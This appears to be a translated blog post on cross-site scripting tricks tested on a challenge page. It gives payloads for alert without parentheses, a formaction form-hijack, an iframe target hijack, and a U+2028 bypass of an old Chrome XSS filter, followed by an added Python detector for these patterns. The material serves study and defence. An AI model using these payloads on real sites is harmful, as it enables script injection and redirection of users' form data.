1. Start with a little XSS knowledge:
No parentheses:
onerror=alert;throw 1;onerror=eval;throw'=alert\x281\x29';
2. A submit button inside a form overrides the form's action.
http://challenge.hackvertor.co.uk/test.php?x=123
<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body>123 <a href="123">test</a></body>
The formaction attribute of a submit button overrides the action attribute of its enclosing form element. So:
http://challenge.hackvertor.co.uk/test.php?x=<form><input type=submit formaction=http://google.com><textarea name=x>
<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><form><input type=submit formaction=http://google.com><textarea name=x> <a href="123">test</a></body>
Controlling only the input element is enough to change where the entire form is submitted. The submission still lands at http://www.google.com.hk/?x=+<a+href="123">test</a></body>
Obviously x is also part of the form: the unclosed <textarea name=x> swallows the rest of the page, so its submitted value is <a href="123">test</a></body>.
Conclusion: the formaction attribute of a button can change the action of the form it sits in.
3. Use an <a> tag on the same page to control an iframe.
<iframe src="http://challenge.hackvertor.co.uk/test.php?x=<iframe name=x></iframe>"></iframe><a href="http://businessinfo.co.uk" target=x id=x></a><script>window.onload=function(){x.click()}</script>
This snippet uses an <a> tag to control the <iframe>.
Test link: http://challenge.hackvertor.co.uk/test.php?x=<iframe name=x></iframe><a href="data:text/html,<script>self.location='http://businessinfo.co.uk'</script>" target=x>Click me</a>
<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><iframe name=x></iframe><a href="data:text/html,<script>self.location='http://businessinfo.co.uk'</script>" target=x>Click me</a> <a href="123">test</a></body>
Click "Click me" to load the iframe.
Conclusion: the target attribute of an <a> tag can be used to control an iframe chosen by name.
4. Example of bypassing Google Chrome's XSS detection:
http://challenge.hackvertor.co.uk/test.php?x=%3Ca%20href=%22javascript:alert(1);%E2%80%A8-%3E
Source code:
<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><a href="javascript:alert(1);
--> <a href="123">test</a></body>
http://challenge.hackvertor.co.uk/test.php?x=%3Ciframe%20src=%22javascript:alert(1)%E2%80%A8-%3E
<!doctype html><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><body><iframe src="javascript:alert(1)
--> <a href="123">test</a></body>
You can see that the decoded source contains the special bytes %E2%80%A8 (the U+2028 line separator), and appending "->" (an HTML comment closer) is enough to bypass the filter. (Tested successfully on Chrome 24.0.1312.52; the latest version has been fixed.)
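As an added example (not from the original post), here is a small Python checker a defender can run over request URLs to flag the three tricks described above: a formaction override on a submit button, an <a target> aimed at a named iframe, and a javascript: URL split with the U+2028 line separator. The sample requests are constructed, and the path test.php and host example.com are assumptions.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample requests (not captured traffic). The query values reuse the
# payload shapes from the post so that each check has something to match.
SAMPLE_REQUESTS = [
    "/test.php?x=123",
    "/test.php?x=%3Cform%3E%3Cinput%20type%3Dsubmit%20formaction%3Dhttp%3A%2F%2F"
    "example.com%3E%3Ctextarea%20name%3Dx%3E",
    "/test.php?x=%3Ciframe%20name%3Dx%3E%3C%2Fiframe%3E%3Ca%20href%3D%22http%3A%2F%2F"
    "example.com%22%20target%3Dx%3EClick%20me%3C%2Fa%3E",
    "/test.php?x=%3Ciframe%20src%3D%22javascript%3Aalert(1)%E2%80%A8-%3E",
]

# Each check runs on the percent-decoded parameter value, i.e. the markup the
# browser would actually receive when test.php reflects it unescaped.
CHECKS = [
    # a formaction attribute on a submit button overrides the enclosing form's action
    ("formaction-override",
     re.compile(r"<(?:input|button)[^>]*\bformaction\s*=", re.I)),
    # a named iframe followed by an <a target=...> that can be pointed at it
    ("iframe-target-hijack",
     re.compile(r"<iframe[^>]*\bname\s*=.*?\btarget\s*=", re.I | re.S)),
    # a javascript: URL inside an attribute value
    ("javascript-url", re.compile(r"\bjavascript\s*:", re.I)),
    # U+2028 / U+2029 line terminators: the post shows U+2028 (%E2%80%A8) used to
    # split a javascript: URL so the old Chrome XSS filter did not recognise it
    ("unicode-line-separator", re.compile("[\u2028\u2029]")),
]


def find_reflected_xss_indicators(url: str) -> dict[str, list[str]]:
    """Return {param_name: [check labels]} for every query parameter that trips a check."""
    findings: dict[str, list[str]] = {}
    # parse_qsl percent-decodes values as UTF-8, so %E2%80%A8 becomes '\u2028'
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = [label for label, pattern in CHECKS if pattern.search(value)]
        if hits:
            findings[name] = hits
    return findings


if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[:60], "->", find_reflected_xss_indicators(request) or "clean")
```

The decoded value, not the raw query string, is what the checks see; a filter that only looks at the raw URL would miss the line separator entirely.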